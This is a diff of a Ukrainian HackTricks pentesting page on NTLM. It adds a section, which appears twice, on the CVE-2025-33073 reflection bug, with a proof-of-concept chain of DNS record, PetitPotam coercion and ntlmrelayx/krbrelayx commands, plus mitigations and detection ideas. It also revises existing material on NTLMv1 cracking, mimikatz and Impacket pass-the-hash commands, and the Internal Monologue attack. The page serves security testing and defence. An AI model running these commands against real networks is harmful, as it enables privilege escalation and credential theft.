diff --git a/src/windows-hardening/ntlm/README.md b/src/windows-hardening/ntlm/README.md index 446336950..58d8e4c91 100644 --- a/src/windows-hardening/ntlm/README.md +++ b/src/windows-hardening/ntlm/README.md @@ -2,11 +2,57 @@ {{#include ../../banners/hacktricks-training.md}} -## Основна інформація +## NTLM & Kerberos *Reflection* via Serialized SPNs (CVE-2025-33073) -В середовищах, де працюють **Windows XP та Server 2003**, використовуються хеші LM (Lan Manager), хоча загальновідомо, що їх легко скомпрометувати. Конкретний хеш LM, `AAD3B435B51404EEAAD3B435B51404EE`, вказує на ситуацію, коли LM не використовується, представляючи хеш для порожнього рядка. +Windows містить кілька заходів, які намагаються запобігти атакам *reflection*, де аутентифікація NTLM (або Kerberos), що походить з хоста, передається назад на **той самий** хост для отримання привілеїв SYSTEM. -За замовчуванням, **Kerberos** є основним методом аутентифікації. NTLM (NT LAN Manager) вступає в гру за певних обставин: відсутність Active Directory, неіснування домену, несправність Kerberos через неправильну конфігурацію або коли спроби підключення здійснюються за допомогою IP-адреси замість дійсного імені хоста. +Microsoft зламав більшість публічних ланцюгів з MS08-068 (SMB→SMB), MS09-013 (HTTP→SMB), MS15-076 (DCOM→DCOM) та пізніми патчами, однак **CVE-2025-33073** показує, що захисти все ще можуть бути обійдені шляхом зловживання тим, як **SMB-клієнт обрізає Імена Основних Служб (SPN)**, які містять *marshalled* (серіалізовану) інформацію про ціль. + +### TL;DR помилки +1. Зловмисник реєструє **DNS A-запис**, чий ярлик кодує marshalled SPN – наприклад, +`srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA → 10.10.10.50` +2. Жертва змушена аутентифікуватися на цьому імені хоста (PetitPotam, DFSCoerce тощо). +3. Коли SMB-клієнт передає рядок цілі `cifs/srv11UWhRCAAAAA…` до `lsasrv!LsapCheckMarshalledTargetInfo`, виклик до `CredUnmarshalTargetInfo` **обрізає** серіалізований об'єкт, залишаючи **`cifs/srv1`**. +4. `msv1_0!SspIsTargetLocalhost` (або еквівалент Kerberos) тепер вважає ціль *localhost*, оскільки коротка частина хоста збігається з ім'ям комп'ютера (`SRV1`). +5. Відповідно, сервер встановлює `NTLMSSP_NEGOTIATE_LOCAL_CALL` і впроваджує **токен доступу SYSTEM LSASS** у контекст (для Kerberos створюється ключ підсесії, позначений як SYSTEM). +6. Передача цієї аутентифікації з `ntlmrelayx.py` **або** `krbrelayx.py` надає повні права SYSTEM на тому ж хості. + +### Quick PoC +```bash +# Add malicious DNS record +dnstool.py -u 'DOMAIN\\user' -p 'pass' 10.10.10.1 \ +-a add -r srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA \ +-d 10.10.10.50 + +# Trigger authentication +PetitPotam.py -u user -p pass -d DOMAIN \ +srv11UWhRCAAAAAAAAAAAAAAAAA… TARGET.DOMAIN.LOCAL + +# Relay listener (NTLM) +ntlmrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support + +# Relay listener (Kerberos) – remove NTLM mechType first +krbrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support +``` +### Patch & Mitigations +* KB патч для **CVE-2025-33073** додає перевірку в `mrxsmb.sys::SmbCeCreateSrvCall`, яка блокує будь-яке SMB з'єднання, якщо його ціль містить маршалізовану інформацію (`CredUnmarshalTargetInfo` ≠ `STATUS_INVALID_PARAMETER`). +* Застосовуйте **SMB підпис** для запобігання рефлексії навіть на непатчених хостах. +* Моніторте DNS записи, що нагадують `*...*`, і блокуйте вектори примусу (PetitPotam, DFSCoerce, AuthIP...). + +### Detection ideas +* Захоплення мережі з `NTLMSSP_NEGOTIATE_LOCAL_CALL`, де IP клієнта ≠ IP сервера. +* Kerberos AP-REQ, що містить підключений ключ і клієнтський принципал, рівний імені хоста. +* Windows Event 4624/4648 SYSTEM логіни, які відразу ж супроводжуються віддаленими SMB записами з того ж хоста. + +## References +* [Synacktiv – NTLM Reflection is Dead, Long Live NTLM Reflection!](https://www.synacktiv.com/en/publications/la-reflexion-ntlm-est-morte-vive-la-reflexion-ntlm-analyse-approfondie-de-la-cve-2025.html) +* [MSRC – CVE-2025-33073](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073) + +## Basic Information + +В середовищах, де працюють **Windows XP та Server 2003**, використовуються LM (Lan Manager) хеші, хоча загальновідомо, що їх легко скомпрометувати. Конкретний LM хеш, `AAD3B435B51404EEAAD3B435B51404EE`, вказує на ситуацію, коли LM не використовується, представляючи хеш для порожнього рядка. + +За замовчуванням, **Kerberos** є основним методом аутентифікації. NTLM (NT LAN Manager) вступає в гру за певних обставин: відсутність Active Directory, неіснування домену, несправність Kerberos через неправильну конфігурацію або коли спроби з'єднання здійснюються за допомогою IP-адреси замість дійсного імені хоста. Наявність заголовка **"NTLMSSP"** в мережевих пакетах сигналізує про процес аутентифікації NTLM. @@ -14,12 +60,12 @@ **Ключові моменти**: -- Хеші LM вразливі, а порожній хеш LM (`AAD3B435B51404EEAAD3B435B51404EE`) свідчить про його не використання. -- Kerberos є методом аутентифікації за замовчуванням, а NTLM використовується лише за певних умов. +- LM хеші вразливі, а порожній LM хеш (`AAD3B435B51404EEAAD3B435B51404EE`) свідчить про його не використання. +- Kerberos є стандартним методом аутентифікації, NTLM використовується лише за певних умов. - Пакети аутентифікації NTLM можна ідентифікувати за заголовком "NTLMSSP". - Протоколи LM, NTLMv1 та NTLMv2 підтримуються системним файлом `msv1\_0.dll`. -## LM, NTLMv1 та NTLMv2 +## LM, NTLMv1 and NTLMv2 Ви можете перевірити та налаштувати, який протокол буде використовуватися: @@ -29,7 +75,7 @@ ![](<../../images/image (919).png>) -### Реєстр +### Registry Це встановить рівень 5: ``` @@ -50,10 +96,10 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t RE 2. Клієнтська машина **надсилає запит на аутентифікацію**, відправляючи **ім'я домену** та **ім'я користувача** 3. **Сервер** надсилає **виклик** 4. **Клієнт шифрує** **виклик**, використовуючи хеш пароля як ключ, і надсилає його у відповідь -5. **Сервер надсилає** до **контролера домену** **ім'я домену, ім'я користувача, виклик та відповідь**. Якщо **немає** налаштованого Active Directory або ім'я домену є ім'ям сервера, облікові дані **перевіряються локально**. +5. **Сервер надсилає** до **контролера домену** **ім'я домену, ім'я користувача, виклик та відповідь**. Якщо **не налаштовано** Active Directory або ім'я домену є ім'ям сервера, облікові дані **перевіряються локально**. 6. **Контролер домену перевіряє, чи все вірно** і надсилає інформацію на сервер -**Сервер** та **контролер домену** можуть створити **Безпечний канал** через сервер **Netlogon**, оскільки контролер домену знає пароль сервера (він знаходиться в базі даних **NTDS.DIT**). +**Сервер** та **контролер домену** можуть створити **захищений канал** через **сервер Netlogon**, оскільки контролер домену знає пароль сервера (він знаходиться в базі даних **NTDS.DIT**). ### Локальна схема аутентифікації NTLM @@ -63,7 +109,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t RE **Довжина виклику становить 8 байт**, а **відповідь має довжину 24 байти**. -**Хеш NT (16 байт)** ділиться на **3 частини по 7 байт кожна** (7B + 7B + (2B+0x00\*5)): **остання частина заповнена нулями**. Потім **виклик** **шифрується окремо** з кожною частиною, а **отримані** зашифровані байти **об'єднуються**. Усього: 8B + 8B + 8B = 24 байти. +**Хеш NT (16 байт)** ділиться на **3 частини по 7 байт кожна** (7B + 7B + (2B+0x00\*5)): **остання частина заповнена нулями**. Потім **виклик** **шифрується окремо** з кожною частиною, а **отримані** зашифровані байти **об'єднуються**. Всього: 8B + 8B + 8B = 24 байти. **Проблеми**: @@ -71,15 +117,15 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t RE - 3 частини можуть бути **атаковані окремо** для знаходження NT хешу - **DES можна зламати** - 3-й ключ завжди складається з **5 нулів**. -- За **однаковим викликом** **відповідь** буде **однаковою**. Тому ви можете дати жертві **виклик** у вигляді рядка "**1122334455667788**" і атакувати відповідь, використовуючи **попередньо обчислені райдужні таблиці**. +- За **однаковим викликом** **відповідь** буде **однаковою**. Тому ви можете дати як **виклик** жертві рядок "**1122334455667788**" і атакувати відповідь, використовуючи **попередньо обчислені райдужні таблиці**. ### Атака NTLMv1 В наш час стає все менш поширеним знаходити середовища з налаштованою неконтрольованою делегацією, але це не означає, що ви не можете **зловживати службою Print Spooler**, яка налаштована. -Ви можете зловживати деякими обліковими даними/сесіями, які у вас вже є в AD, щоб **попросити принтер аутентифікуватися** проти деякого **хоста під вашим контролем**. Потім, використовуючи `metasploit auxiliary/server/capture/smb` або `responder`, ви можете **встановити виклик аутентифікації на 1122334455667788**, захопити спробу аутентифікації, і якщо вона була виконана за допомогою **NTLMv1**, ви зможете **зламати її**.\ +Ви могли б зловживати деякими обліковими даними/сесіями, які у вас вже є в AD, щоб **попросити принтер аутентифікуватися** проти деякого **хоста під вашим контролем**. Потім, використовуючи `metasploit auxiliary/server/capture/smb` або `responder`, ви можете **встановити виклик аутентифікації на 1122334455667788**, захопити спробу аутентифікації, і якщо вона була виконана за допомогою **NTLMv1**, ви зможете **зламати її**.\ Якщо ви використовуєте `responder`, ви можете спробувати **використати прапор `--lm`**, щоб спробувати **знизити** **аутентифікацію**.\ -_Зверніть увагу, що для цієї техніки аутентифікація повинна виконуватися за допомогою NTLMv1 (NTLMv2 не дійсний)._ +_Зверніть увагу, що для цієї техніки аутентифікація повинна виконуватися за допомогою NTLMv1 (NTLMv2 не є дійсним)._ Пам'ятайте, що принтер буде використовувати обліковий запис комп'ютера під час аутентифікації, а облікові записи комп'ютерів використовують **довгі та випадкові паролі**, які ви **ймовірно не зможете зламати**, використовуючи звичайні **словники**. Але **аутентифікація NTLMv1** **використовує DES** ([більше інформації тут](#ntlmv1-challenge)), тому, використовуючи деякі служби, спеціально призначені для зламу DES, ви зможете його зламати (ви можете використовувати [https://crack.sh/](https://crack.sh) або [https://ntlmv1.com/](https://ntlmv1.com), наприклад). @@ -155,9 +201,9 @@ NTHASH=b4b9b02e6f09a9bd760f388b6700586c ``` ### NTLMv2 Challenge -Довжина **виклику становить 8 байт** і **надсилаються 2 відповіді**: одна має **довжину 24 байти**, а довжина **іншої** є **змінною**. +Довжина **виклику становить 8 байт** і **надсилаються 2 відповіді**: одна з них **довжиною 24 байти**, а довжина **іншої** є **змінною**. -**Перша відповідь** створюється шляхом шифрування за допомогою **HMAC_MD5** рядка, що складається з **клієнта та домену**, використовуючи як **ключ** хеш MD4 **NT hash**. Потім **результат** буде використаний як **ключ** для шифрування за допомогою **HMAC_MD5** **виклику**. До цього буде **додано клієнтський виклик довжиною 8 байт**. Усього: 24 Б. +**Перша відповідь** створюється шляхом шифрування за допомогою **HMAC_MD5** рядка, що складається з **клієнта та домену**, використовуючи в якості **ключа** хеш MD4 **NT hash**. Потім **результат** буде використаний як **ключ** для шифрування за допомогою **HMAC_MD5** **виклику**. До цього **додасться клієнтський виклик довжиною 8 байт**. Усього: 24 Б. **Друга відповідь** створюється з використанням **декількох значень** (новий клієнтський виклик, **часова мітка** для запобігання **атакам повтору**...) @@ -165,8 +211,8 @@ NTHASH=b4b9b02e6f09a9bd760f388b6700586c ## Pass-the-Hash -**Якщо у вас є хеш жертви**, ви можете використовувати його для **імітування**.\ -Вам потрібно використовувати **інструмент**, який **виконає** **аутентифікацію NTLM, використовуючи** цей **хеш**, **або** ви можете створити новий **sessionlogon** і **впровадити** цей **хеш** всередину **LSASS**, так що коли будь-яка **аутентифікація NTLM виконується**, цей **хеш буде використаний.** Останній варіант - це те, що робить mimikatz. +**Якщо у вас є хеш жертви**, ви можете використовувати його для **імітованої аутентифікації**.\ +Вам потрібно використовувати **інструмент**, який **виконає** **NTLM аутентифікацію, використовуючи** цей **хеш**, **або** ви можете створити новий **sessionlogon** і **впровадити** цей **хеш** в **LSASS**, так що коли будь-яка **NTLM аутентифікація буде виконана**, цей **хеш буде використаний.** Останній варіант - це те, що робить mimikatz. **Будь ласка, пам'ятайте, що ви також можете виконувати атаки Pass-the-Hash, використовуючи облікові записи комп'ютерів.** @@ -176,21 +222,21 @@ NTHASH=b4b9b02e6f09a9bd760f388b6700586c ```bash Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"' ``` -Це запустить процес, який буде належати користувачам, які запустили mimikatz, але внутрішньо в LSASS збережені облікові дані - це ті, що всередині параметрів mimikatz. Потім ви можете отримати доступ до мережевих ресурсів так, ніби ви є тим користувачем (схоже на трюк `runas /netonly`, але вам не потрібно знати пароль у відкритому вигляді). +Це запустить процес, який буде належати користувачам, що запустили mimikatz, але внутрішньо в LSASS збережені облікові дані - це ті, що всередині параметрів mimikatz. Потім ви можете отримати доступ до мережевих ресурсів так, ніби ви є тим користувачем (схоже на трюк `runas /netonly`, але вам не потрібно знати пароль у відкритому вигляді). ### Pass-the-Hash з linux Ви можете отримати виконання коду на Windows машинах, використовуючи Pass-the-Hash з Linux.\ -[**Доступ сюди, щоб дізнатися, як це зробити.**](https://github.com/carlospolop/hacktricks/blob/master/windows/ntlm/broken-reference/README.md) +[**Доступ тут, щоб дізнатися, як це зробити.**](https://github.com/carlospolop/hacktricks/blob/master/windows/ntlm/broken-reference/README.md) ### Інструменти Impacket для Windows -Ви можете завантажити [бінарники impacket для Windows тут](https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries). +Ви можете завантажити [бінарні файли impacket для Windows тут](https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries). - **psexec_windows.exe** `C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.my.domain.local` - **wmiexec.exe** `wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local` - **atexec.exe** (У цьому випадку вам потрібно вказати команду, cmd.exe та powershell.exe не є дійсними для отримання інтерактивної оболонки)`C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'` -- Є ще кілька бінарників Impacket... +- Є ще кілька бінарних файлів Impacket... ### Invoke-TheHash @@ -234,19 +280,19 @@ wce.exe -s ::: ../lateral-movement/ {{#endref}} -## Витягування облікових даних з Windows хоста +## Витягування облікових даних з Windows Host -**Для отримання додаткової інформації про** [**те, як отримати облікові дані з Windows хоста, вам слід прочитати цю сторінку**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/ntlm/broken-reference/README.md)**.** +**Для отримання додаткової інформації про** [**те, як отримати облікові дані з Windows host, вам слід прочитати цю сторінку**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/ntlm/broken-reference/README.md)**.** -## Атака внутрішнього монологу +## Атака Internal Monologue -Атака внутрішнього монологу є прихованою технікою витягування облікових даних, яка дозволяє зловмиснику отримувати NTLM хеші з машини жертви **без прямої взаємодії з процесом LSASS**. На відміну від Mimikatz, який читає хеші безпосередньо з пам'яті і часто блокується рішеннями безпеки кінцевих точок або Credential Guard, ця атака використовує **локальні виклики до пакету аутентифікації NTLM (MSV1_0) через Інтерфейс постачальника підтримки безпеки (SSPI)**. Зловмисник спочатку **знижує налаштування NTLM** (наприклад, LMCompatibilityLevel, NTLMMinClientSec, RestrictSendingNTLMTraffic), щоб забезпечити дозволеність NetNTLMv1. Потім вони підробляють існуючі токени користувачів, отримані з працюючих процесів, і запускають NTLM аутентифікацію локально, щоб згенерувати відповіді NetNTLMv1, використовуючи відомий виклик. +Атака Internal Monologue є прихованою технікою витягування облікових даних, яка дозволяє зловмиснику отримувати NTLM хеші з машини жертви **без прямої взаємодії з процесом LSASS**. На відміну від Mimikatz, який читає хеші безпосередньо з пам'яті і часто блокується рішеннями безпеки кінцевих точок або Credential Guard, ця атака використовує **локальні виклики до пакету аутентифікації NTLM (MSV1_0) через Інтерфейс підтримки безпеки (SSPI)**. Зловмисник спочатку **знижує налаштування NTLM** (наприклад, LMCompatibilityLevel, NTLMMinClientSec, RestrictSendingNTLMTraffic), щоб забезпечити дозволеність NetNTLMv1. Потім вони підробляють існуючі токени користувачів, отримані з працюючих процесів, і запускають аутентифікацію NTLM локально, щоб згенерувати відповіді NetNTLMv1, використовуючи відомий виклик. -Після захоплення цих відповідей NetNTLMv1 зловмисник може швидко відновити оригінальні NTLM хеші, використовуючи **попередньо обчислені райдужні таблиці**, що дозволяє здійснювати подальші атаки Pass-the-Hash для бічного переміщення. Важливо, що атака внутрішнього монологу залишається прихованою, оскільки не генерує мережевий трафік, не інжектує код і не викликає прямі дампи пам'яті, що ускладнює виявлення для захисників у порівнянні з традиційними методами, такими як Mimikatz. +Після захоплення цих відповідей NetNTLMv1 зловмисник може швидко відновити оригінальні NTLM хеші, використовуючи **попередньо обчислені райдужні таблиці**, що дозволяє подальші атаки Pass-the-Hash для бічного переміщення. Важливо, що атака Internal Monologue залишається прихованою, оскільки не генерує мережевий трафік, не впроваджує код і не викликає прямі дампи пам'яті, що ускладнює виявлення для захисників у порівнянні з традиційними методами, такими як Mimikatz. Якщо NetNTLMv1 не приймається — через впроваджені політики безпеки, зловмисник може не змогти отримати відповідь NetNTLMv1. -Щоб вирішити цю ситуацію, інструмент Internal Monologue був оновлений: він динамічно отримує токен сервера, використовуючи `AcceptSecurityContext()`, щоб все ще **захопити відповіді NetNTLMv2**, якщо NetNTLMv1 не вдається. Хоча NetNTLMv2 значно важче зламати, він все ще відкриває шлях для релейних атак або офлайн брутфорсу в обмежених випадках. +Щоб вирішити цю проблему, інструмент Internal Monologue був оновлений: він динамічно отримує токен сервера, використовуючи `AcceptSecurityContext()`, щоб все ще **захопити відповіді NetNTLMv2**, якщо NetNTLMv1 не вдається. Хоча NetNTLMv2 набагато важче зламати, він все ще відкриває шлях для релейних атак або офлайн брутфорсу в обмежених випадках. PoC можна знайти за адресою **[https://github.com/eladshamir/Internal-Monologue](https://github.com/eladshamir/Internal-Monologue)**. @@ -262,4 +308,50 @@ PoC можна знайти за адресою **[https://github.com/eladshamir **Ви можете використовувати** [**https://github.com/mlgualtieri/NTLMRawUnHide**](https://github.com/mlgualtieri/NTLMRawUnHide) +## NTLM & Kerberos *Reflection* через серіалізовані SPN (CVE-2025-33073) + +Windows містить кілька заходів, які намагаються запобігти *reflection* атакам, де аутентифікація NTLM (або Kerberos), що походить з хоста, релеюється назад на **той самий** хост для отримання привілеїв SYSTEM. + +Microsoft зламав більшість публічних ланцюгів з MS08-068 (SMB→SMB), MS09-013 (HTTP→SMB), MS15-076 (DCOM→DCOM) та пізнішими патчами, однак **CVE-2025-33073** показує, що захисти все ще можуть бути обійдені шляхом зловживання тим, як **SMB клієнт обрізає Імена основних служб (SPN)**, які містять *маршалізовану* (серіалізовану) інформацію про ціль. + +### Коротко про помилку +1. Зловмисник реєструє **DNS A-запис**, чий ярлик кодує маршалізований SPN – наприклад, +`srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA → 10.10.10.50` +2. Жертва змушена аутентифікуватися до цього імені хоста (PetitPotam, DFSCoerce тощо). +3. Коли SMB клієнт передає рядок цілі `cifs/srv11UWhRCAAAAA…` до `lsasrv!LsapCheckMarshalledTargetInfo`, виклик до `CredUnmarshalTargetInfo` **обрізає** серіалізований об'єкт, залишаючи **`cifs/srv1`**. +4. `msv1_0!SspIsTargetLocalhost` (або еквівалент Kerberos) тепер вважає ціль *localhost*, оскільки коротка частина хоста збігається з ім'ям комп'ютера (`SRV1`). +5. Відповідно, сервер встановлює `NTLMSSP_NEGOTIATE_LOCAL_CALL` і впроваджує **токен доступу SYSTEM LSASS** у контекст (для Kerberos створюється ключ підсесії, позначений SYSTEM). +6. Релеюючи цю аутентифікацію за допомогою `ntlmrelayx.py` **або** `krbrelayx.py`, ви отримуєте повні права SYSTEM на тому ж хості. + +### Швидкий PoC +```bash +# Add malicious DNS record +dnstool.py -u 'DOMAIN\\user' -p 'pass' 10.10.10.1 \ +-a add -r srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA \ +-d 10.10.10.50 + +# Trigger authentication +PetitPotam.py -u user -p pass -d DOMAIN \ +srv11UWhRCAAAAAAAAAAAAAAAAA… TARGET.DOMAIN.LOCAL + +# Relay listener (NTLM) +ntlmrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support + +# Relay listener (Kerberos) – remove NTLM mechType first +krbrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support +``` +### Патчі та пом'якшення +* Патч KB для **CVE-2025-33073** додає перевірку в `mrxsmb.sys::SmbCeCreateSrvCall`, яка блокує будь-яке SMB з'єднання, ціль якого містить маршалізовану інформацію (`CredUnmarshalTargetInfo` ≠ `STATUS_INVALID_PARAMETER`). +* Застосовуйте **SMB підпис** для запобігання рефлексії навіть на непатчених хостах. +* Моніторте DNS записи, що нагадують `*...*` та блокуйте вектори примусу (PetitPotam, DFSCoerce, AuthIP...). + +### Ідеї для виявлення +* Захоплення мережі з `NTLMSSP_NEGOTIATE_LOCAL_CALL`, де IP клієнта ≠ IP сервера. +* Kerberos AP-REQ, що містить підключений ключ та клієнтський принципал, рівний імені хоста. +* Журнали Windows Event 4624/4648 SYSTEM, які негайно слідують за віддаленими SMB записами з того ж хоста. + +## Посилання +* [Synacktiv – NTLM Reflection is Dead, Long Live NTLM Reflection!](https://www.synacktiv.com/en/publications/la-reflexion-ntlm-est-morte-vive-la-reflexion-ntlm-analyse-approfondie-de-la-cve-2025.html) +* [MSRC – CVE-2025-33073](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073) + {{#include ../../banners/hacktricks-training.md}}